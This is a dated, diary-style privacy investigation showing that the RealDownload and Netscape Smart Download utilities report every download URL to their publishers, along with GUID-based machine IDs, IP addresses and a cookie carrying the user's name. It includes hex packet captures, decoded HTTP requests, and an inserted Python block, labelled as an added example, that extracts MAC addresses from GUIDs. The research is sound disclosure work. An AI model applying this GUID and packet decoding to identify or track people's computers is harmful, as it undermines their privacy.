I download fresh copies of all three Download Demon-descended file downloading utilities and conduct a series of tests to verify the rumors I've heard about their "phoning home" behavior.
In each case, the behavior I examined resulted from each program's "default configuration" which is enabled unless deliberately disabled by the user. I confirmed that all three programs send a report back to their publishers whenever the program is used to download any file through the Internet. This report includes the full URL of the file being downloaded and an "ID Tag" which could be used to uniquely identify the downloading computer. In the case of Netscape's Smart Download, the computer's individual Internet IP address is also sent as a "cookie header" which would tend to defeat IP-masking proxies and anonymizers.

Since I was quite alarmed by what I had found and then carefully confirmed, I immediately began notifying the 338,584 members (currently) of my User Managed eMail Notification System and I created a new discussion newsgroup to contain our subsequent public discussion of this issue.

Monday, July 17

By Certified Mail I receive RealNetworks' threat letter which I ignore because it's just so much nonsense and proceed to initiate a very constructive dialog with two representatives of RealNetworks. Their V.P. of Government Affairs and Privacy informs me that I am absolutely, totally, and completely mistaken and insists that I immediately take this page down and retract all of my public statements to everyone who has received them. (I guess he must have read Robert Kimball's letter too.)

I refuse to remove the page based solely upon his forceful representations and assurances. But I worry in the face of their legal threats that I might somehow have been completely mistaken. So I quickly post a big red notice at the top of this page to notify its readers that RealNetworks is very sure that I am completely wrong, and that I am immediately working to re-verify all of my findings.

Then a much more serious RealDownload privacy concern rears its ugly head:

It's Monday afternoon, and everything still comes out just the way it did Friday.
(In other words, I was right all along.) However, this time I happen to notice that my actual first and last name, and my own private eMail alias address are also being transmitted to RealNetworks as a result of each file download. So I immediately forward the captured packet to the RealNetworks representatives with whom I'm working and ask them what is going on.

By phone the technical manager with whom I'm speaking asks if I've ever purchased anything from Real. I explain that a few months ago I purchased "Real Producer" in order to produce streaming content for my web site. So she explains that my purchase and interaction with their eCommerce server left a "cookie" on my computer which included my real name and personal eMail address from the purchase transaction.

I see. So now my private information which was obtained by RealNetworks during a SECURE PURCHASE TRANSACTION with an explicit commitment for security, privacy, and secrecy is being sent back to Real months later "in the clear" with no security, every time I download arbitrary files from the Internet using their utility, along with the full name of the file I downloaded and the unique ID that could be used to identify my computer.

I think that's a "Real" problem. And it would certainly seem to contradict RealNetworks' repeated statements that it is not possible for them to associate my use of RealDownload with any personally identifiable information. If my name and private eMail address aren't "personally identifiable information", what is? Moreover, that personal information could be easily associated with the file download which directly triggered the transmission of that information. Based upon my understanding of how and why this happens, this is easily reproducible and is apparently going on all the time with RealNetworks customers . . . like right now.
If what I've been told by the RealNetworks technical manager is true (and it certainly fits the facts and logic), it appears that anyone who has purchased a RealNetworks product through their eCommerce system receives an insecure, plaintext cookie containing their actual name and eMail address. I certainly did. And this cookie is then sent back to RealNetworks . . . . . . even in situations where users of RealNetworks' products have been repeatedly and even forcefully assured of their absolute anonymity. Whoops.

On a Technical Point:

RealNetworks has stated repeatedly that they care about their users' privacy. And they tell us that they are "the leader in the delivery of Internet media." Monday they told me that they employ 400 programmers. With all that, wouldn't you be inclined to presume that they had a grasp on Internet Technology? If they care about our privacy, why are they storing my real name and private eMail address from an eCommerce transaction as "plain text" in a cookie, and sending it out without any security whatsoever? Even if it weren't being sent back due to a file download it would still be a significant privacy concern. Why not, instead, use a cookie the way it was intended to be used? A cookie should be an "opaque token": an apparently meaningless string of characters, which only has meaning to the entity which created it.

But none of that was the problem I was facing at the moment. (Perhaps we'll deal with that one next.) I was working to demonstrate to the RealNetworks representatives the absolute truth of what I'd been saying about the transmission of a system-unique ID. So, using RealDownload, I downloaded three different files over the course of several hours and from different Internet servers.
I captured each resulting 'downloadid' as it was leaving my computer on its way to RealNetworks:

downloadid=9B1450495BF211D4A025002018252799
downloadid=9B14504A5BF211D4A025002018252799
downloadid=9B14504B5BF211D4A025002018252799

As you can see, they differ by a single character, and that character is changing from "9" to "A" to "B", which indicates standard hexadecimal counting. So I sent these 'downloadids' to the RealNetworks representatives. This apparently puzzled Real's technical manager, who said that she'd have to get back to me on it. When she called back she explained that, sure enough, they had succeeded in duplicating the same behavior in their labs and . . . that it must be a bug.

A "bug"?? Yeah . . . okay . . . I guess that would be a big one?

She explained that she had just learned that the last 24 characters of the 'downloadid''s 32 characters were derived from a Windows GUID. "GUID" stands for "Globally Unique IDentifier" and is a technology standard specified by the Open Software Foundation (OSF) to create unique and non-repeating "ID Tags". Such "ID Tags" are generated once then stored, typically in the Windows Registry. If you're really curious, use the Windows "RegEdit" program to look under this key name:

HKEY_CLASSES_ROOT\CLSID

and you'll see a billion GUIDs. (Don't change anything!) In the past, the use of GUIDs has aroused the wrath and concern of privacy advocates the world over, since they are like "serial numbers" which can be used to uniquely identify software users.

Okay. So now we know how and where RealNetworks gets the last 24 characters of their 'downloadid'. It is a non-changing unique identifier, different for every computer.
Today, they may not like the fact that their use of a deliberately unique and fixed identifier has severe privacy overtones, nor that they have been caught in an outright lie about their use of an identifier which is being transmitted and could be used to track the software download habits of their RealDownload users. But I never expected that forcing them to publicly confess the truth would make them particularly happy.

downloadid=9B145049 / 5BF211D4A025002018252799

It appears to be quite likely that the first eight characters are a hexadecimal representation of a 32-bit binary quantity that is incremented for every download; that, in any event, is the behavior I witnessed. So the first portion, which appears to be incremented for each download, functions like a "download session ID". Whereas the last 24 characters are exactly what I have always asserted: A "download machine ID." Together, they create a deliberately concocted, unique identifier which, when transmitted from any user's computer, could be used to track their users' download behavior over time and to assemble a download profiling database.

Tuesday, July 18

Things were much quieter today. I was told that RealNetworks staff was "in meetings" most of the day. Then, at the end of this long day of "meetings" (which were apparently spent carefully wording the following document), RealNetworks produced this formal statement:

REALNETWORKS PRIVACY STATEMENT 7/18/00

In response to recent questions regarding certain technical functions of its RealDownload product, RealNetworks today issued the following statement:

"We emphatically disagree with the implications raised by certain members of the technical community about the behavior or planned behavior of RealDownload. To be clear: RealDownload does not transmit personally identifiable user information to RealNetworks without informed consent. It does not monitor users' behavior and it does not log download URL information.
Because we do not log download URL information and the product does not transmit registration information identifying the RealDownload user, we cannot and do not store download URLs with personal information and we never have.

"We work very hard to ensure that our products comply with all of our privacy policies. We have even taken the extra step of hiring Arthur Andersen to independently review our compliance with our own strict privacy policies. Through its eSure audit program, Arthur Andersen has independently verified that RealNetworks does not store URLs transmitted from the RealDownload product.

"Because of the way RealDownload interoperates with the APIs of certain versions of the Windows operating system, it creates for each download a new, 32-character code that does not contain any personal information, but apparently does not fully randomize during each download. Now that we are aware of this technical issue, and because the 32-character code serves no purpose, we are removing it from forthcoming versions of RealDownload.

"As the leader in the delivery of Internet media, we at RealNetworks set for ourselves and will adhere to the highest privacy standards. We appreciate the ongoing diligence of privacy experts and we will continue to develop RealNetworks products in a manner that respects customers' privacy."

Tuesday Evening . . . July 18

ZDTV's Leo Laporte and I discuss the current situation on Leo's ScreenSavers show:
Are you being watched when you download?

Wednesday, July 19

Regarding RealNetworks' Statement:

Since I am in the hot seat here, being the "certain members of the technical community" who has "raised implications", the world will be looking for my reaction to this statement from RealNetworks. I received their statement first from RealNetworks directly, then subsequently from several members of the media. Everyone has wanted my reaction. Here it is:

I am unconcerned and unimpressed with most of RealNetworks' Statement.
They specifically failed to address the reason for the presence of the "insufficiently random" 32-character code whose very existence they had previously denied emphatically. I am, however, pleased to learn that they have decided that it now "serves no purpose" and will forthwith be removed from the product. The sooner the better for everyone involved.

We are still left with what is, arguably, a much bigger problem: The undeniable transmission of personal and private "personally identifiable" information as a direct consequence of the use of RealDownload. See the full technical 'dissection' below . . .

Thursday, July 20

Everything I hear from RealNetworks indicates that they are taking every issue I have raised on this page very seriously . . . and not just paying them lip-service, but really doing something quickly: I am told (but have not yet verified) that the opportunity for the significant "personally identifiable" information leakage has already been fixed. That's got to be a record: I only published my discovery of it this morning!

WHOOPS! Spoke too soon. NOT FIXED as of end of day Friday!

As I detail below, the potential breach arose from RealDownload images being served from the eCommerce site's domain, thus exposing an eCommerce-derived cookie during a RealDownload transaction. But since the image URLs were being provided on-the-fly by the RealDownload server, their source server could be changed with no change to the product. By serving the RealDownload images from the RealDownload (non-commerce) server, eCommerce cookie disclosures will no longer be triggered. Tomorrow I will verify that this is, in fact, now happening.

We are still left with the problem of RealNetworks' storage and transmission "in plaintext form" of information which was received by them over a secure connection. I will publish an analysis and discussion of this issue tomorrow.

I am told that RealNetworks may release a new version of RealDownload tomorrow . . .
thus breaking another retooling speed record. So we might soon have a new version of RealDownload that does not, and can not, send unique "per-computer" identifiers back to RealNetworks' servers.

Any Internet server is typically able to determine the Internet (IP) address of a connected client, such as the user's computer when it sends a file download report. That's how my own 'ShieldsUp' security testing system operates. Therefore, RealDownload users who are extremely security conscious, and who have non-dynamic IP addresses (most non-dial-up users), may still desire to disable RealDownload's "per file" reporting function so that all "per-download" reporting is disabled.

We'll see what tomorrow brings. Things are looking up.

Friday, July 21

July 21: "RealNetworks Inc. admitted today its RealDownload software could be used to track specific users' exact download habits."
http://www.msnbc.com/news/436070.asp

My determination to dig out the WHOLE truth takes an unexpected turn today. Curious about the fact that the size of a full Windows GUID is exactly the same as the size of RealNetworks' infamous 'downloadid', I write my own little program to request GUIDs from the Windows operating environment.
Running this program three times on the same computer which performed Monday's results generates the following three GUIDs:

Three Successive Windows GUIDs WITHOUT reboots

GUID = CCDE2D405EF811D4A025002018252799
GUID = CCDE2D415EF811D4A025002018252799
GUID = CCDE2D425EF811D4A025002018252799

Notice that, EXACTLY like the three successive downloadids generated by RealDownload on Monday, these GUIDs differ from each other in exactly one character, that this character is counting, and most significantly, the LAST 20 CHARACTERS of the GUIDs I generated exactly match the tail of the 'downloadid':

GUID       = CCDE2D405EF8 11D4A025002018252799
downloadid = 9B1450495BF2 11D4A025002018252799

Next, I use my GUID-maker program to generate three GUIDs, but I restart Windows each time:

Three Windows GUIDs WITH REBOOTS

GUID = A7F1BFC05FD811D4A025002018252799
GUID = 39CC01805FD911D4A025002018252799
GUID = 8ADA6EE05FD911D4A025002018252799

We see that the first 12 characters of the GUIDs are different (especially the first eight), whereas the 20-character GUID tail is absolutely constant, even across reboots of a single system.

Network adapters are designed to possess "globally unique" MAC addresses in order to prevent physical address collisions when communicating across a local network segment. This means that network adapter MAC addresses are a good source for some guaranteed-to-be-unique "bits". Therefore, the Open Software Foundation's (OSF) GUID creation scheme incorporates the machine's LAN adapter MAC address, when available, into the GUID's creation.
Since the tests have so far been conducted on a networked machine with a LAN adapter, the next logical step would be to perform them on a machine without a network card:

Three Windows GUIDs WITH REBOOTS and NO LAN Adapter MAC Address

GUID = 7A9196805FE811D4BA1DA6C968FAE763
GUID = 147026E05FE911D4BA1D8FF112DACE63
GUID = 9C1C35205FE911D4BA1DA55166FEC463

As you can see above, without a LAN adapter's static MAC address available, the situation again changes. Now a region in the center of the GUIDs is static across GUID generation and across reboots, but the last 12 characters, which had previously never changed, are now very different after each reboot.

So What Does it All Mean?

It means this is a big mess. All of the evidence indicates that RealNetworks' 'downloadid' actually is nothing more or less than a standard Windows GUID.

downloadid == GUID

The RealNetworks technical manager told me, Monday, that the last 24 characters of their 'downloadid' were "derived from" a Windows GUID. And while I suppose that's technically correct, it's a bit misleading, since I am now virtually certain that their 'downloadid' is exactly and without 'derivation' a Windows GUID.

"Huh? They're using dynamically generated Windows GUIDs as their download IDs?"

Yeah . . . I know . . . It is a really weird and dumb thing to do: As we have clearly seen, it is not reliably static enough to use as a trustworthy per-computer identifier, yet it is one, sort of, most of the time, maybe. But neither is it random enough to be used as an opaque per-transaction identifier (as I believe it was intended) without the serious privacy concerns that I originally raised.

Here's exactly what I believe happened: The copy of NetZip's Download Demon I analyzed exhibits precisely the same behavior as RealNetworks' RealDownload. Therefore, I believe that prior to RealNetworks' acquisition of Download Demon from NetZip, some programmer at NetZip wasn't the least bit concerned about privacy issues.
(This is certainly still more the rule than the exception today.) So this programmer innocently uses a Windows GUID as a convenient unique tag for their Demon's transaction tracking. This programmer never stops to consider, if he or she even knew, that the GUID contains by design and specification the machine's absolutely unique LAN adapter MAC address, or some other relatively invariant machine-specific tagging information if the system has no LAN card.

Next, RealNetworks apparently commits two blunders:

They employ Arthur Andersen to provide a third-party blessing of a second-party product. Since I doubt that the folks from Arthur Andersen are grossly incompetent, it can only be that they don't really care about, or understand, the nature and requirements for personal privacy. They put the Arthur Andersen eSeal of Approval on a product which is not only sending a unique identifier, but managing to transmit its user's unique MAC adapter address across the Internet while intimately associating it with every file download. Yikes!

RealNetworks, for its part, either didn't perform its own effective or useful code review on a second-party acquired product, or it, too, is not sufficiently aware of the requirements for personal privacy. Oh sure, RealNetworks has license agreements, privacy policies, and rampaging lawyers galore, but its actual products suffer time and again from significant privacy concerns.

RealNetworks has, undeniably, fumbled their acquisition of Download Demon and the release of RealDownload, but . . . A completely fair reading of the evidence suggests that RealNetworks never meant to violate anyone's privacy. And, significantly, this is absolutely different from the conclusion I would draw from the design of Netscape's superficially similar Smart Download product. As you will see below, Smart Download creates an ID Tag in the registry of any machine it's installed on and transmits that Tag with every file download report.
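The GUID anatomy examined in the Friday, July 21 entry, as an added example (not code from the article or from RealNetworks): it splits the article's own 'downloadid' and GUID values into the OSF DCE / RFC 4122 version-1 fields, pulls the 48-bit node (MAC) field out of the tail, and shows which series keeps a constant node across downloads and reboots. The three sample lists are copied from the text above; the field names are the standard ones.

```python
"""Decode the 32-hex-character Windows GUIDs and RealDownload 'downloadid'
values quoted in the article into their version-1 (OSF DCE / RFC 4122) fields:
time_low(8) time_mid(4) time_hi_and_version(4) clock_seq(4) node(12).
Added example; not code from the article or from RealNetworks."""
import re
from dataclasses import dataclass

HEX32 = re.compile(r"^[0-9A-Fa-f]{32}$")

# Sample values exactly as printed in the article (Windows 98 test machine
# whose captured frames show LAN adapter MAC 00-20-18-25-27-99).
DOWNLOADIDS = [
    "9B1450495BF211D4A025002018252799",
    "9B14504A5BF211D4A025002018252799",
    "9B14504B5BF211D4A025002018252799",
]
GUIDS_WITH_REBOOTS = [
    "A7F1BFC05FD811D4A025002018252799",
    "39CC01805FD911D4A025002018252799",
    "8ADA6EE05FD911D4A025002018252799",
]
GUIDS_NO_LAN_ADAPTER = [
    "7A9196805FE811D4BA1DA6C968FAE763",
    "147026E05FE911D4BA1D8FF112DACE63",
    "9C1C35205FE911D4BA1DA55166FEC463",
]


@dataclass(frozen=True)
class GuidV1:
    time_low: int
    time_mid: int
    time_hi: int        # 12 timestamp bits left after the version nibble
    version: int
    clock_seq: int      # 14 bits left after the variant bits
    node: bytes         # 48-bit node field: the adapter MAC when one exists

    @property
    def node_str(self):
        return "-".join(f"{b:02X}" for b in self.node)

    @property
    def node_multicast_bit(self):
        """RFC 4122 requires a node that is NOT an IEEE 802 address to set the
        multicast bit (0x01 of the first octet). Set means "certainly not a
        MAC"; clear is only consistent with a MAC (the article's no-LAN GUIDs
        have it clear yet change per reboot), so constancy across reboots,
        not this bit, is the real test for a per-machine identifier."""
        return bool(self.node[0] & 0x01)


def parse_guid(hex32):
    """Split a 32-hex-character GUID (braces/dashes tolerated) into fields."""
    s = re.sub(r"[{}-]", "", hex32)
    if not HEX32.match(s):
        raise ValueError(f"not a 32-hex-character GUID: {hex32!r}")
    thv, cs = int(s[12:16], 16), int(s[16:20], 16)
    return GuidV1(time_low=int(s[0:8], 16), time_mid=int(s[8:12], 16),
                  time_hi=thv & 0x0FFF, version=thv >> 12,
                  clock_seq=cs & 0x3FFF, node=bytes.fromhex(s[20:32]))


def shared_node(values):
    """The node string if every GUID carries the same one, else None. A node
    that survives downloads and reboots is the per-machine tag the article
    describes; the no-LAN-adapter series gives None."""
    nodes = {parse_guid(v).node_str for v in values}
    return nodes.pop() if len(nodes) == 1 else None


def time_low_deltas(values):
    """Differences between consecutive time_low fields: [1, 1] for the three
    downloadids, i.e. a counter rather than anything random."""
    lows = [parse_guid(v).time_low for v in values]
    return [b - a for a, b in zip(lows, lows[1:])]


if __name__ == "__main__":
    for label, vals in (("downloadid", DOWNLOADIDS),
                        ("GUID, reboots", GUIDS_WITH_REBOOTS),
                        ("GUID, no LAN adapter", GUIDS_NO_LAN_ADAPTER)):
        g = parse_guid(vals[0])
        print(f"{label}: v{g.version} node={g.node_str} "
              f"multicast_bit={g.node_multicast_bit} shared={shared_node(vals)}")
```

The node field of every LAN-adapter sample decodes to 00-20-18-25-27-99, the same source MAC that appears in the captured frames further down the page.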
Tuesday, July 25

CONFIRMED: The currently downloadable new version of RealDownload omits the infamous downloadid from its "phoning home" per-file download reports. The reports (enabled by default) continue to be sent, but any user-tracking would be much less accurate now, needing to be based upon the user's potentially dynamic IP address. ("Phoning home" is a fundamentally non-private action for any Internet software.)

CONFIRMED: Previous version(s) of RealDownload continue to retrieve images from RealNetworks' eCommerce server domain. RealNetworks customers who received an insecure personal cookie containing their name and address will have this private and personally identifiable information transmitted as a result of the use of previous version(s) of RealDownload. I was told this privacy breach would be eliminated five days ago . . . yet it continues.

To Summarize before we examine the details . . .

In order to confirm or deny the reports alleging that the Real Networks and Netscape/AOL download utilities might be spying on their users by secretly "phoning home" with detailed reports of every file their users download, I used a readily available "packet sniffer" to monitor the data being sent from one of my machines when downloading a handful of my own website's files.

I was able to quickly confirm that the NetZip-descended downloaders used by Real Networks and Netscape/AOL were, indeed, sending detailed reports of every download "back to base" every time they were used to download a file. These reports contained the complete Internet URL of the file being downloaded and were accompanied by an apparently unique "ID Tag" which was associated with each machine. To confirm this, I experimented with downloads from several different computers. In every case the "apparently unique ID" being sent out never changed on the same computer, and each computer has its own.
Netscape's Smart Download goes one step further by including the computer's IP address in a separate "cookie" header. This is troubling, since "cookie" headers tend to be left alone as they pass through proxies and anonymizers. This would thwart deliberate attempts at keeping the computer's IP address confidential.

When you consider that each user's computer is uniquely identified, and that reports are being sent back for every file downloaded and accompanied by a unique ID tag (and, in the case of Netscape, the machine's unique IP address) . . . . . . It is NATURAL to wonder WHY this information is being transmitted, and to what end the data is being put!

Dissecting RealDownload's Packet Traffic

After installing RealNetworks' RealDownload utility, I clicked on a web link to download the file "id.exe" from my server at "grc.com". The following TCP/IP data packet was immediately sent out of my computer to one of Real's servers:

MAC source address: 00-20-18-25-27-99
MAC dest address:   00-90-7F-01-21-E8
Frame type: IP
Protocol: TCP->HTTP
Source IP address: 207.71.92.206
Dest IP address:   207.188.30.49
Source port: 1107
Destination port: 80
SEQ: 3073973
ACK: 169605441
Packet size: 417
Packet data:

0000: 00 90 7F 01 21 E8 00 20 18 25 27 99 08 00 45 00  ....!.. .%'...E.
0010: 01 93 1C 0A 00 00 40 06 43 58 CF 47 5C CE CF BC  ......@.CX.G\...
0020: 1E 31 04 53 00 50 00 2E E7 B5 0A 1B F9 41 50 18  .1.S.P.......AP.
0030: FF FF 44 5A 00 00 47 45 54 20 2F 73 61 32 2E 61  ..DZ..GET /sa2.a
0040: 73 70 3F 70 72 6F 64 75 63 74 3D 52 65 61 6C 44  sp?product=RealD
0050: 6F 77 6E 6C 6F 61 64 26 76 65 72 73 69 6F 6E 3D  ownload&version=
0060: 34 2E 30 2E 30 2E 31 38 26 70 6C 61 74 66 6F 72  4.0.0.18&platfor
0070: 6D 3D 57 69 6E 39 38 26 65 76 65 6E 74 3D 64 6F  m=Win98&event=do
0080: 77 6E 6C 6F 61 64 53 74 61 72 74 26 75 72 6C 3D  wnloadStart&url=
0090: 68 74 74 70 25 33 41 25 32 46 25 32 46 67 72 63  http%3A%2F%2Fgrc
00A0: 2E 63 6F 6D 25 32 46 66 69 6C 65 73 25 32 46 69  .com%2Ffiles%2Fi
00B0: 64 2E 7A 69 70 26 72 65 66 75 72 6C 3D 67 72 63  d.zip&refurl=grc
00C0: 2E 63 6F 6D 26 66 69 6C 65 73 69 7A 65 3D 31 32  .com&filesize=12
00D0: 33 32 38 26 6D 69 6D 65 3D 61 70 70 6C 69 63 61  328&mime=applica
00E0: 74 69 6F 6E 25 32 46 7A 69 70 26 70 65 72 63 65  tion%2Fzip&perce
00F0: 6E 74 3D 30 26 64 6F 77 6E 6C 6F 61 64 69 64 3D  nt=0&downloadid=
0100: 39 42 31 34 35 30 34 39 35 42 46 32 31 31 44 34  9B1450495BF211D4
0110: 41 30 32 35 30 30 32 30 31 38 32 35 32 37 39 39  A025002018252799
0120: 26 73 62 69 64 3D 26 73 70 6F 6E 73 6F 72 3D 72  &sbid=&sponsor=r
0130: 64 62 61 73 69 63 20 48 54 54 50 2F 31 2E 30 0D  dbasic HTTP/1.0.
0140: 0A 48 6F 73 74 3A 20 73 61 2E 6E 65 74 7A 69 70  .Host: sa.netzip
0150: 2E 63 6F 6D 0D 0A 41 63 63 65 70 74 3A 20 2A 2F  .com..Accept: */
0160: 2A 0D 0A 43 6F 6F 6B 69 65 3A 20 4C 61 73 74 49  *..Cookie: LastI
0170: 6E 66 6F 49 44 3D 31 30 30 32 3B 73 62 69 72 73  nfoID=1002;sbirs
0180: 68 61 72 65 3D 72 64 62 61 73 69 63 0D 0A 52 61  hare=rdbasic..Ra
0190: 6E 67 65 3A 20 62 79 74 65 73 3D 30 2D 0D 0A 0D  nge: bytes=0-...
01A0: 0A

This rather intimidating looking hexadecimal data block (above) can be easily "parsed" into something far more intelligible.
Breaking the block of ASCII text (over in the right hand column) into individual lines (at the '&' delimiter), and translating the "URL Encoding" (those %3A and %2F which mean ":" and "/" respectively), the first long line we see, which is the "command" being given to RealNetworks' server, is:

GET /sa2.asp?
    product=RealDownload
    version=4.0.0.18
    platform=Win98
    event=downloadStart
    url=http://grc.com/files/id.zip
    refurl=grc.com
    filesize=12328
    mime=application/zip
    percent=0
    downloadid=9B1450495BF211D4A025002018252799
    sbid=
    sponsor=rdbasic
HTTP/1.0

The balance of the data transmitted consists of the additional information "parameters" shown below:

Host: sa.netzip.com
Accept: */*
Cookie: LastInfoID=1002;sbirshare=rdbasic
Range: bytes=0-

So, what does the data analysis show us?

The complete URL of the file I downloaded was sent to the receiving server: "url=http://grc.com/files/id.exe". The receiving server thus knows the location and full filename of the link I clicked on to download.

My machine and I have been "tagged" by the compound "Key" of:

9B1450495BF211D4A025002018252799

Which can be broken into its two component parts:

9B145049   5BF211D4A025002018252799

The left chunk is a "counter" which appears to be incremented once for every file downloaded. I believe that this serves as a "session ID" to separate and identify individual downloads being conducted by a single computer. The right-hand chunk is the "computer ID" which is, according to RealNetworks, based upon a Globally Unique ID (GUID) and is used to uniquely identify the computer into which RealDownload has been installed.

The Big Bad Boondoggle...

When I was re-examining the RealDownload system on Monday, July 17th, something caught my eye that I had missed on the previous Friday: My full name, and the private eMail alias I always use for on-line purchases, was sent out of my computer to one of Real's servers when I downloaded a file using RealDownload.
RealNetworks' repetitious assertions that it is NOT POSSIBLE for them to associate our RealDownload-mediated downloads with our actual identity, or that no "personally identifiable information" is transmitted without our informed consent, appear to be no more correct than their previous assertions about the lack of RealDownload's ID tagging.

Just so we're really clear here: I am NOT alleging that RealNetworks IS making this association. I have no evidence of that one way or the other. But I AM proving that they absolutely COULD if they chose to. Furthermore, for some reason which is not known to me, they have repeatedly stated that they CAN NOT.

MAC source address: 00-20-18-25-27-99
MAC dest address:   00-90-7F-01-21-E8
Frame type: IP
Protocol: TCP->HTTP
Source IP address: 207.71.92.206
Dest IP address:   208.147.89.135
Source port: 1108
Destination port: 80
SEQ: 3074088
ACK: 3078494647
Packet size: 339
Packet data:

0000: 00 90 7F 01 21 E8 00 20 18 25 27 99 08 00 45 00  ....!.. .%'...E.
0010: 01 45 1E 0A 00 00 40 06 05 79 CF 47 5C CE D0 93  .E....@..y.G\...
0020: 59 87 04 54 00 50 00 2E E8 28 B7 7E 19 B7 50 18  Y..T.P...(....P.
0030: FF FF 05 FB 00 00 47 45 54 20 2F 61 64 73 2F 68  ......GET /ads/h
0040: 6F 75 73 65 5F 6A 75 6B 65 62 6F 78 31 2E 67 69  ouse_jukebox1.gi
0050: 66 20 48 54 54 50 2F 31 2E 31 0D 0A 41 63 63 65  f HTTP/1.1..Acce
0060: 70 74 3A 20 2A 2F 2A 0D 0A 41 63 63 65 70 74 2D  pt: */*..Accept-
0070: 4C 61 6E 67 75 61 67 65 3A 20 65 6E 2D 75 73 0D  Language: en-us.
0080: 0A 41 63 63 65 70 74 2D 45 6E 63 6F 64 69 6E 67  .Accept-Encoding
0090: 3A 20 67 7A 69 70 2C 20 64 65 66 6C 61 74 65 0D  : gzip, deflate.
00A0: 0A 55 73 65 72 2D 41 67 65 6E 74 3A 20 4D 6F 7A  .User-Agent: Moz
00B0: 69 6C 6C 61 2F 34 2E 30 20 28 63 6F 6D 70 61 74  illa/4.0 (compat
00C0: 69 62 6C 65 3B 20 4D 53 49 45 20 35 2E 30 3B 20  ible; MSIE 5.0;
00D0: 57 69 6E 64 6F 77 73 20 39 38 3B 20 44 69 67 45  Windows 98; DigE
00E0: 78 74 29 0D 0A 43 6F 6F 6B 69 65 3A 20 52 4E 45  xt)..Cookie: RNE
00F0: 63 6F 6D 6D 3D 76 65 72 32 2E 30 7C ?? ?? ?? ??  comm=ver2.0|xxxx
0100: ?? ?? ?? ?? ?? ?? ?? ?? ?? 7C 53 74 65 76 65 7C  xxxxxxxxx|Steve|
0110: 47 69 62 73 6F 6E 7C 4F 46 46 7C 39 58 33 47 38  Gibson|OFF|9X3G8
0120: 0D 0A 43 6F 6E 6E 65 63 74 69 6F 6E 3A 20 4B 65  ..Connection: Ke
0130: 65 70 2D 41 6C 69 76 65 0D 0A 48 6F 73 74 3A 20  ep-Alive..Host:
0140: 69 6D 61 67 65 73 2E 72 65 61 6C 2E 63 6F 6D 0D  images.real.com.
0150: 0A 0D 0A                                         ...

As before, we can easily break this rather intimidating looking hexadecimal data block into its much more easily readable header lines:

GET /ads/house_jukebox1.gif HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)
Cookie: RNEcomm=ver2.0|xxxxxxxxxxxxxxxxxx|Steve|Gibson|OFF|9X3G8
Connection: Keep-Alive
Host: images.real.com

The "Cookie" header line (shown above) which is present in the outbound transmission to one of RealNetworks' servers (a transmission which was triggered by my use of RealDownload) not only demonstrates that RealNetworks has again misrepresented their capabilities, if not their actions and intentions, but also that they are careless in the extreme with their customers' personal and private data:

Cookie: RNEcomm=ver2.0|xxxxxxxxxxxxxxxxxx|Steve|Gibson|OFF|9X3G8

Breaking this down with the benefit of what the RealNetworks technical manager told me: I am guessing that the "RNEcomm=ver2.0" string stands for "Real Networks Electronic Commerce version 2.0".
The string of 'xxxxxxxxxxxxxxxxxx' shown above was, when captured on its way out of my computer, my personal and private eMail address alias which would have been used during an online eCommerce purchase. I hope that you (the reader) will understand that I desire to protect its privacy here even if RealNetworks hasn't.

The next two fields, "Steve" and "Gibson", are rather clear. If this isn't "personally identifiable information" being sent during the use of RealDownload, I can't imagine what would be.

I can't guess what the last two fields, "OFF" and "9X3G8", might refer to. But logic would indicate that the "9X3G8" is an identifier which refers in some way to my past purchase of "Real Producer", which the RealNetworks technical manager concluded was the event which planted this very persistent cookie onto my computer for subsequent re-transmission at various odd (and in some cases potentially awkward and certainly non-anonymous) moments . . . such as whenever using their supposedly anonymous RealDownload agent.

You will notice that the server ("Host:") to which the offending Cookie was sent appears to be 'images.real.com'. This is a different server, at a different Internet IP address, from the one which received RealDownload's file download report. However, Internet server-clustering technologies, for aggregating data across disparate servers, are readily available, and we would expect a company like RealNetworks to be at the forefront of such bandwidth management technology. Thus the fact that the information was sent to different servers does not prevent its ready association.

Because this represents an extremely great concern for all of us, and especially for privacy advocates, I want to be very clear again that I am not alleging that such associating of these two separate communications IS being done, but only that RealNetworks' repeated assertion that it COULD NOT BE DONE appears to be patently false.
Dissecting Smart Download's Packet Traffic

After installing Netscape's Smart Download utility, I clicked on a web link to download the file "tip.exe" from my server at "grc.com". The following TCP/IP data packet was immediately sent out of my computer to one of Netscape's servers:

MAC source address: 00-20-18-25-27-99
MAC dest address:   00-90-7F-01-21-E8
Frame type: IP
Protocol: TCP->HTTP
Source IP address: 207.71.92.206
Dest IP address:   207.200.75.206
Source port: 1041
Destination port: 80
SEQ: 330513
ACK: 750466305
Packet size: 450
Packet data:

0000: 00 90 7F 01 21 E8 00 20 18 25 27 99 08 00 45 00  ....!.. .%'...E.
0010: 01 B4 9C 00 40 00 80 06 15 97 CF 47 5C CE CF C8  ....@......G\...
0020: 4B CE 04 11 00 50 00 05 0B 11 2C BB 35 01 50 18  K....P....,.5.P.
0030: 22 38 44 F5 00 00 47 45 54 20 2F 63 67 69 2D 62  "8D...GET /cgi-b
0040: 69 6E 2F 73 64 5F 73 65 72 76 65 72 2E 63 67 69  in/sd_server.cgi
0050: 3F 70 6C 61 74 66 6F 72 6D 3D 77 69 6E 39 38 26  ?platform=win98&
0060: 76 65 72 73 69 6F 6E 3D 31 2C 2B 31 2C 2B 30 2C  version=1,+1,+0,
0070: 2B 36 36 26 75 72 6C 3D 68 74 74 70 25 33 41 25  +66&url=http%3A%
0080: 32 46 25 32 46 67 72 63 2E 63 6F 6D 25 32 46 66  2F%2Fgrc.com%2Ff
0090: 69 6C 65 73 25 32 46 74 69 70 2E 65 78 65 26 4B  iles%2Ftip.exe&K
00A0: 65 79 3D 42 52 55 4E 4F 33 39 36 44 46 32 37 33  ey=BRUNO396DF273
00B0: 20 48 54 54 50 2F 31 2E 30 0D 0A 50 72 61 67 6D   HTTP/1.0..Pragm
00C0: 61 3A 20 6E 6F 2D 63 61 63 68 65 0D 0A 43 6F 6E  a: no-cache..Con
00D0: 6E 65 63 74 69 6F 6E 3A 20 4B 65 65 70 2D 41 6C  nection: Keep-Al
00E0: 69 76 65 0D 0A 55 73 65 72 2D 41 67 65 6E 74 3A  ive..User-Agent:
00F0: 20 4E 65 74 5A 69 70 2D 44 6F 77 6E 6C 6F 61 64   NetZip-Download
0100: 65 72 2F 31 2E 30 2E 36 32 20 28 57 69 6E 33 32  er/1.0.62 (Win32
